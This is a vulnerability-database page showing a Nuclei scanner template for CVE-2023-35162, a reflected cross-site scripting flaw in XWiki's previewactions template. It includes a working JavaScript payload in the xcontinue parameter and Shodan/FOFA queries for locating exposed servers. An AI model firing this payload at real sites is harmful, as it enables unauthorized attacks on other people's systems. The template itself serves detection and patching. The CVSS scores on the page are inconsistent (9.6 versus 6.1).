Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-35162
HistoryJun 06, 2024 - 9:59 a.m.

XWiki < 14.10.5 - Cross-Site Scripting

2024-06-0609:59:33
ProjectDiscovery
github.com
4
cve
xwiki
xss
reflected
unauthorized
patches

9.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

7.3 High

AI Score

Confidence

High

0.67 Medium

EPSS

Percentile

98.0%

XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.
id: CVE-2023-35162

info:
  name: XWiki < 14.10.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.
  impact: |
    Successful exploitation could lead to unauthorized access or data theft.
  remediation: |
    Apply the latest patches provided by XWiki to mitigate the vulnerability.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20342
    - https://github.com/xwiki/xwiki-platform/blob/244dbbaa0738a0c40b19929c0369c8b62ae5236e/xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/previewactions.vm#L48
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35162
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-35162
    cwe-id: CWE-79
    epss-score: 0.00129
    epss-percentile: 0.47675
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query:
      - XWiki
      - xwiki
      - http.html:"data-xwiki-reference"
    fofa-query: "body=\"data-xwiki-reference\""
  tags: cve,cve2023,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "name=\"xcontinue\" value=\"javascript:alert(document.domain)")'
          - 'contains(body, "previewactions.vm")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100c6e714e3d33b065507816e176e9f2be23252e0b05e84a4f0e6309440dabd0afa0221009ffd025b7bf1d45fb4926720821acd73a98d13982380dbf46ba15d57c33102e7:922c64590222798bb761d5b6d8e72950

9.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

7.3 High

AI Score

Confidence

High

0.67 Medium

EPSS

Percentile

98.0%

Related for NUCLEI:CVE-2023-35162